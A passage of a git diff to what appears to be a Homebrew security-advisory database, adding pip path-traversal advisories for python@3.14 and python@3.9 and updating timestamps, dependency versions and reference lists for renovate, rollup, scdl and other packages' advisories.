b/advisories/BREW-python@3.14-CVE-2026-13346.json new file mode 100644 index 00000000000..fddc0f33648 --- /dev/null +++ b/advisories/BREW-python@3.14-CVE-2026-13346.json @@ -0,0 +1,75 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.14-CVE-2026-13346", + "published": "2026-08-22T09:30:07Z", + "modified": "2026-08-22T09:30:07Z", + "upstream": [ + "PYSEC-2026-3721", + "CVE-2026-13346" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.14", + "purl": "pkg:brew/python%403.14" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.14.7" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "26.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "details": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7" + }, + { + "type": "ADVISORY", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/" + }, + { + "type": "FIX", + "url": "https://github.com/pypa/pip/pull/14110" + } + ] +} diff --git a/advisories/BREW-python@3.9-CVE-2026-13346.json b/advisories/BREW-python@3.9-CVE-2026-13346.json new file mode 100644 index 00000000000..eb8a5ecad63 --- /dev/null +++ b/advisories/BREW-python@3.9-CVE-2026-13346.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.9-CVE-2026-13346", + "published": "2026-08-22T09:30:07Z", + "modified": "2026-08-22T09:30:07Z", + "upstream": [ + "PYSEC-2026-3721", + "CVE-2026-13346" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.9", + "purl": "pkg:brew/python%403.9" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "ecosystem_specific": { + "fix": null, + "range_state": "affected", + "upstream_fixed_in": "26.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@25.3" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "25.3", + "key": "pkg:pypi/pip@25.3", + "resource": "pip" + } + ] + }, + "details": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7" + }, + { + "type": "ADVISORY", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/" + }, + { + "type": "FIX", + "url": "https://github.com/pypa/pip/pull/14110" + } + ] +} diff --git a/advisories/BREW-rapid-mlx-CVE-2020-7694.json b/advisories/BREW-rapid-mlx-CVE-2020-7694.json index 120d3ad09f8..150a975c550 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-7694.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-7694", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-17T17:48:20Z", + "modified": "2026-08-22T09:31:06Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.3" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-rapid-mlx-CVE-2020-7695.json b/advisories/BREW-rapid-mlx-CVE-2020-7695.json index e86f8f50572..95b8d804f31 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-7695.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-7695", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-17T17:48:20Z", + "modified": "2026-08-22T09:31:06Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.3" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-renovate-CVE-2024-58376.json b/advisories/BREW-renovate-CVE-2024-58376.json index 6a2cbb25fa4..45b515a3140 100644 --- a/advisories/BREW-renovate-CVE-2024-58376.json +++ b/advisories/BREW-renovate-CVE-2024-58376.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-renovate-CVE-2024-58376", "published": "2026-08-20T09:37:20Z", - "modified": "2026-08-20T09:37:20Z", + "modified": "2026-08-22T09:31:35Z", "upstream": [ "CVE-2024-58376", "GHSA-rqgv-292v-5qgr" @@ -43,15 +43,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/renovatebot/renovate", - "subject_version": "44.35.0", + "subject_version": "44.39.0", "key": "https://github.com/renovatebot/renovate" }, { "strategy": "registry", "ecosystem": "npm", "name": "renovate", - "subject_version": "44.35.0", - "key": "pkg:npm/renovate@44.35.0" + "subject_version": "44.39.0", + "key": "pkg:npm/renovate@44.39.0" } ] }, diff --git a/advisories/BREW-renovate-CVE-2026-76226.json b/advisories/BREW-renovate-CVE-2026-76226.json index be08190fd22..2b3fae585ca 100644 --- a/advisories/BREW-renovate-CVE-2026-76226.json +++ b/advisories/BREW-renovate-CVE-2026-76226.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-renovate-CVE-2026-76226", "published": "2026-08-20T09:37:20Z", - "modified": "2026-08-20T09:37:20Z", + "modified": "2026-08-22T09:31:35Z", "upstream": [ "CVE-2026-76226", "GHSA-5vjq-5jmg-39xq" @@ -43,15 +43,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/renovatebot/renovate", - "subject_version": "44.35.0", + "subject_version": "44.39.0", "key": "https://github.com/renovatebot/renovate" }, { "strategy": "registry", "ecosystem": "npm", "name": "renovate", - "subject_version": "44.35.0", - "key": "pkg:npm/renovate@44.35.0" + "subject_version": "44.39.0", + "key": "pkg:npm/renovate@44.39.0" } ] }, diff --git a/advisories/BREW-renovate-CVE-2026-76227.json b/advisories/BREW-renovate-CVE-2026-76227.json index a08d28a9ef6..7fbd4c9ed61 100644 --- a/advisories/BREW-renovate-CVE-2026-76227.json +++ b/advisories/BREW-renovate-CVE-2026-76227.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-renovate-CVE-2026-76227", "published": "2026-08-20T09:37:20Z", - "modified": "2026-08-20T09:37:20Z", + "modified": "2026-08-22T09:31:35Z", "upstream": [ "CVE-2026-76227", "GHSA-8wc6-vgrq-x6cf" @@ -43,15 +43,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/renovatebot/renovate", - "subject_version": "44.35.0", + "subject_version": "44.39.0", "key": "https://github.com/renovatebot/renovate" }, { "strategy": "registry", "ecosystem": "npm", "name": "renovate", - "subject_version": "44.35.0", - "key": "pkg:npm/renovate@44.35.0" + "subject_version": "44.39.0", + "key": "pkg:npm/renovate@44.39.0" } ] }, diff --git a/advisories/BREW-renovate-CVE-2026-76228.json b/advisories/BREW-renovate-CVE-2026-76228.json index 13cb1fd73ec..480197f3947 100644 --- a/advisories/BREW-renovate-CVE-2026-76228.json +++ b/advisories/BREW-renovate-CVE-2026-76228.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-renovate-CVE-2026-76228", "published": "2026-08-20T09:37:20Z", - "modified": "2026-08-20T09:37:20Z", + "modified": "2026-08-22T09:31:35Z", "upstream": [ "CVE-2026-76228", "GHSA-pfq2-hh62-7m96" @@ -43,15 +43,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/renovatebot/renovate", - "subject_version": "44.35.0", + "subject_version": "44.39.0", "key": "https://github.com/renovatebot/renovate" }, { "strategy": "registry", "ecosystem": "npm", "name": "renovate", - "subject_version": "44.35.0", - "key": "pkg:npm/renovate@44.35.0" + "subject_version": "44.39.0", + "key": "pkg:npm/renovate@44.39.0" } ] }, diff --git a/advisories/BREW-renovate-CVE-2026-76229.json b/advisories/BREW-renovate-CVE-2026-76229.json index a8565612ff8..e99208f35c8 100644 --- a/advisories/BREW-renovate-CVE-2026-76229.json +++ b/advisories/BREW-renovate-CVE-2026-76229.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-renovate-CVE-2026-76229", "published": "2026-08-20T09:37:20Z", - "modified": "2026-08-20T09:37:20Z", + "modified": "2026-08-22T09:31:35Z", "upstream": [ "CVE-2026-76229", "GHSA-xv56-3wq5-9997" @@ -43,15 +43,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/renovatebot/renovate", - "subject_version": "44.35.0", + "subject_version": "44.39.0", "key": "https://github.com/renovatebot/renovate" }, { "strategy": "registry", "ecosystem": "npm", "name": "renovate", - "subject_version": "44.35.0", - "key": "pkg:npm/renovate@44.35.0" + "subject_version": "44.39.0", + "key": "pkg:npm/renovate@44.39.0" } ] }, @@ -68,10 +68,6 @@ "type": "ADVISORY", "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/76xxx/CVE-2026-76229.json" }, - { - "type": "FIX", - "url": "https://github.com/renovatebot/renovate/commit/cc08c6e98f19e6258c5d3180c70c98e1be0b0d37" - }, { "type": "ADVISORY", "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-xv56-3wq5-9997" @@ -83,6 +79,10 @@ { "type": "ADVISORY", "url": "https://www.vulncheck.com/advisories/renovate-before-arbitrary-command-injection-via-kustomize" + }, + { + "type": "FIX", + "url": "https://github.com/renovatebot/renovate/commit/cc08c6e98f19e6258c5d3180c70c98e1be0b0d37" } ] } diff --git a/advisories/BREW-renovate-CVE-2026-76230.json b/advisories/BREW-renovate-CVE-2026-76230.json index e12d0705621..2807b8b8dda 100644 --- a/advisories/BREW-renovate-CVE-2026-76230.json +++ b/advisories/BREW-renovate-CVE-2026-76230.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-renovate-CVE-2026-76230", "published": "2026-08-20T09:37:20Z", - "modified": "2026-08-20T09:37:20Z", + "modified": "2026-08-22T09:31:35Z", "upstream": [ "CVE-2026-76230", "GHSA-fr4j-65pv-gjjj" @@ -43,15 +43,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/renovatebot/renovate", - "subject_version": "44.35.0", + "subject_version": "44.39.0", "key": "https://github.com/renovatebot/renovate" }, { "strategy": "registry", "ecosystem": "npm", "name": "renovate", - "subject_version": "44.35.0", - "key": "pkg:npm/renovate@44.35.0" + "subject_version": "44.39.0", + "key": "pkg:npm/renovate@44.39.0" } ] }, @@ -68,14 +68,6 @@ "type": "ADVISORY", "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/76xxx/CVE-2026-76230.json" }, - { - "type": "FIX", - "url": "https://github.com/renovatebot/renovate/commit/012c0ac2fe32832e60a62bde405c0a241efd314c" - }, - { - "type": "FIX", - "url": "https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c" - }, { "type": "ADVISORY", "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-fr4j-65pv-gjjj" @@ -87,6 +79,14 @@ { "type": "ADVISORY", "url": "https://www.vulncheck.com/advisories/renovate-before-command-injection-via-npm" + }, + { + "type": "FIX", + "url": "https://github.com/renovatebot/renovate/commit/012c0ac2fe32832e60a62bde405c0a241efd314c" + }, + { + "type": "FIX", + "url": "https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c" } ] } diff --git a/advisories/BREW-renovate-CVE-2026-76231.json b/advisories/BREW-renovate-CVE-2026-76231.json index f65f6b7ecce..56834b2a39a 100644 --- a/advisories/BREW-renovate-CVE-2026-76231.json +++ b/advisories/BREW-renovate-CVE-2026-76231.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-renovate-CVE-2026-76231", "published": "2026-08-20T09:37:20Z", - "modified": "2026-08-20T09:37:20Z", + "modified": "2026-08-22T09:31:35Z", "upstream": [ "CVE-2026-76231", "GHSA-36j9-mx87-2cff" @@ -43,15 +43,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/renovatebot/renovate", - "subject_version": "44.35.0", + "subject_version": "44.39.0", "key": "https://github.com/renovatebot/renovate" }, { "strategy": "registry", "ecosystem": "npm", "name": "renovate", - "subject_version": "44.35.0", - "key": "pkg:npm/renovate@44.35.0" + "subject_version": "44.39.0", + "key": "pkg:npm/renovate@44.39.0" } ] }, @@ -68,6 +68,18 @@ "type": "ADVISORY", "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/76xxx/CVE-2026-76231.json" }, + { + "type": "ADVISORY", + "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-36j9-mx87-2cff" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76231" + }, + { + "type": "ADVISORY", + "url": "https://www.vulncheck.com/advisories/renovate-before-command-injection-via-hermit" + }, { "type": "FIX", "url": "https://github.com/renovatebot/renovate/commit/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c" @@ -83,18 +95,6 @@ { "type": "FIX", "url": "https://github.com/renovatebot/renovate/commit/eaec10d7c8afadbdd783ac47bd2adbfab444d6df" - }, - { - "type": "ADVISORY", - "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-36j9-mx87-2cff" - }, - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76231" - }, - { - "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/renovate-before-command-injection-via-hermit" } ] } diff --git a/advisories/BREW-renovate-CVE-2026-76232.json b/advisories/BREW-renovate-CVE-2026-76232.json index 1dea14dda1d..f8f8f55367e 100644 --- a/advisories/BREW-renovate-CVE-2026-76232.json +++ b/advisories/BREW-renovate-CVE-2026-76232.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-renovate-CVE-2026-76232", "published": "2026-08-20T09:37:20Z", - "modified": "2026-08-20T09:37:20Z", + "modified": "2026-08-22T09:31:35Z", "upstream": [ "CVE-2026-76232", "GHSA-3f44-xw83-3pmg" @@ -43,15 +43,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/renovatebot/renovate", - "subject_version": "44.35.0", + "subject_version": "44.39.0", "key": "https://github.com/renovatebot/renovate" }, { "strategy": "registry", "ecosystem": "npm", "name": "renovate", - "subject_version": "44.35.0", - "key": "pkg:npm/renovate@44.35.0" + "subject_version": "44.39.0", + "key": "pkg:npm/renovate@44.39.0" } ] }, @@ -68,14 +68,6 @@ "type": "ADVISORY", "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/76xxx/CVE-2026-76232.json" }, - { - "type": "FIX", - "url": "https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c" - }, - { - "type": "FIX", - "url": "https://github.com/renovatebot/renovate/commit/f372a68144a4d78c9f7f418168e4efe03336a432" - }, { "type": "ADVISORY", "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-3f44-xw83-3pmg" @@ -87,6 +79,14 @@ { "type": "ADVISORY", "url": "https://www.vulncheck.com/advisories/renovate-before-command-injection-via-helmv3-2" + }, + { + "type": "FIX", + "url": "https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c" + }, + { + "type": "FIX", + "url": "https://github.com/renovatebot/renovate/commit/f372a68144a4d78c9f7f418168e4efe03336a432" } ] } diff --git a/advisories/BREW-renovate-CVE-2026-76233.json b/advisories/BREW-renovate-CVE-2026-76233.json index 915438f2a5f..21116c0e4e5 100644 --- a/advisories/BREW-renovate-CVE-2026-76233.json +++ b/advisories/BREW-renovate-CVE-2026-76233.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-renovate-CVE-2026-76233", "published": "2026-08-20T09:37:20Z", - "modified": "2026-08-20T09:37:20Z", + "modified": "2026-08-22T09:31:35Z", "upstream": [ "CVE-2026-76233", "GHSA-xjr7-3c3g-m763" @@ -43,15 +43,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/renovatebot/renovate", - "subject_version": "44.35.0", + "subject_version": "44.39.0", "key": "https://github.com/renovatebot/renovate" }, { "strategy": "registry", "ecosystem": "npm", "name": "renovate", - "subject_version": "44.35.0", - "key": "pkg:npm/renovate@44.35.0" + "subject_version": "44.39.0", + "key": "pkg:npm/renovate@44.39.0" } ] }, @@ -68,10 +68,6 @@ "type": "ADVISORY", "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/76xxx/CVE-2026-76233.json" }, - { - "type": "FIX", - "url": "https://github.com/renovatebot/renovate/commit/d29698e0131231652970f02765312769975e4d38" - }, { "type": "ADVISORY", "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-xjr7-3c3g-m763" @@ -83,6 +79,10 @@ { "type": "ADVISORY", "url": "https://www.vulncheck.com/advisories/renovate-before-command-injection-via-gleam-manager" + }, + { + "type": "FIX", + "url": "https://github.com/renovatebot/renovate/commit/d29698e0131231652970f02765312769975e4d38" } ] } diff --git a/advisories/BREW-renovate-GHSA-36rh-ggpr-j3gj.json b/advisories/BREW-renovate-GHSA-36rh-ggpr-j3gj.json index 47308065976..b6b466b6f48 100644 --- a/advisories/BREW-renovate-GHSA-36rh-ggpr-j3gj.json +++ b/advisories/BREW-renovate-GHSA-36rh-ggpr-j3gj.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-renovate-GHSA-36rh-ggpr-j3gj", "published": "2026-08-13T17:32:30Z", - "modified": "2026-08-20T09:37:20Z", + "modified": "2026-08-22T09:31:35Z", "upstream": [ "GHSA-36rh-ggpr-j3gj" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "renovate", - "subject_version": "44.35.0", - "key": "pkg:npm/renovate@44.35.0" + "subject_version": "44.39.0", + "key": "pkg:npm/renovate@44.39.0" } ] }, diff --git a/advisories/BREW-renovate-GHSA-v7x3-7hw7-pcjg.json b/advisories/BREW-renovate-GHSA-v7x3-7hw7-pcjg.json index f097973b370..451b1a851aa 100644 --- a/advisories/BREW-renovate-GHSA-v7x3-7hw7-pcjg.json +++ b/advisories/BREW-renovate-GHSA-v7x3-7hw7-pcjg.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-renovate-GHSA-v7x3-7hw7-pcjg", "published": "2026-08-13T17:32:30Z", - "modified": "2026-08-20T09:37:20Z", + "modified": "2026-08-22T09:31:35Z", "upstream": [ "GHSA-v7x3-7hw7-pcjg" ], @@ -42,8 +42,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "renovate", - "subject_version": "44.35.0", - "key": "pkg:npm/renovate@44.35.0" + "subject_version": "44.39.0", + "key": "pkg:npm/renovate@44.39.0" } ] }, diff --git a/advisories/BREW-rockcraft-CVE-2026-59939.json b/advisories/BREW-rockcraft-CVE-2026-59939.json index 86b6f23569e..657b56f07d1 100644 --- a/advisories/BREW-rockcraft-CVE-2026-59939.json +++ b/advisories/BREW-rockcraft-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rockcraft-CVE-2026-59939", "published": "2026-08-13T17:32:32Z", - "modified": "2026-08-13T17:32:32Z", + "modified": "2026-08-22T09:31:37Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -92,6 +92,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-rollup-CVE-2024-47068.json b/advisories/BREW-rollup-CVE-2024-47068.json index d2137663a59..fe045027227 100644 --- a/advisories/BREW-rollup-CVE-2024-47068.json +++ b/advisories/BREW-rollup-CVE-2024-47068.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rollup-CVE-2024-47068", "published": "2026-08-13T17:32:32Z", - "modified": "2026-08-13T17:32:32Z", + "modified": "2026-08-22T09:31:37Z", "upstream": [ "GHSA-gcx4-mw62-g8wm", "CVE-2024-47068" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "rollup", - "subject_version": "4.62.4", - "key": "pkg:npm/rollup@4.62.4" + "subject_version": "4.62.5", + "key": "pkg:npm/rollup@4.62.5" } ] }, diff --git a/advisories/BREW-rollup-CVE-2026-27606.json b/advisories/BREW-rollup-CVE-2026-27606.json index 15260ccd41d..290613461ff 100644 --- a/advisories/BREW-rollup-CVE-2026-27606.json +++ b/advisories/BREW-rollup-CVE-2026-27606.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rollup-CVE-2026-27606", "published": "2026-08-13T17:32:32Z", - "modified": "2026-08-13T17:32:32Z", + "modified": "2026-08-22T09:31:37Z", "upstream": [ "GHSA-mw96-cpmx-2vgc", "CVE-2026-27606" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "rollup", - "subject_version": "4.62.4", - "key": "pkg:npm/rollup@4.62.4" + "subject_version": "4.62.5", + "key": "pkg:npm/rollup@4.62.5" } ] }, diff --git a/advisories/BREW-scdl-CVE-2015-8557.json b/advisories/BREW-scdl-CVE-2015-8557.json index 871b40eb94e..6eba5cbc1f1 100644 --- a/advisories/BREW-scdl-CVE-2015-8557.json +++ b/advisories/BREW-scdl-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2015-8557", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-scdl-CVE-2021-20270.json b/advisories/BREW-scdl-CVE-2021-20270.json index 20feefcb584..96584d564ae 100644 --- a/advisories/BREW-scdl-CVE-2021-20270.json +++ b/advisories/BREW-scdl-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2021-20270", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-scdl-CVE-2021-27291.json b/advisories/BREW-scdl-CVE-2021-27291.json index c3583ccf10e..dbfd788e2c0 100644 --- a/advisories/BREW-scdl-CVE-2021-27291.json +++ b/advisories/BREW-scdl-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2021-27291", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-scdl-CVE-2022-40896.json b/advisories/BREW-scdl-CVE-2022-40896.json index 72b37aaa60f..3b133b3f9e4 100644 --- a/advisories/BREW-scdl-CVE-2022-40896.json +++ b/advisories/BREW-scdl-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2022-40896", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-scdl-CVE-2023-35934.json b/advisories/BREW-scdl-CVE-2023-35934.json index 8f3998896d2..3d360256506 100644 --- a/advisories/BREW-scdl-CVE-2023-35934.json +++ b/advisories/BREW-scdl-CVE-2023-35934.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2023-35934", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-v8mc-9377-rwjj", "CVE-2023-35934", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2023.7.06", "resource": "yt-dlp", - "resource_purl": 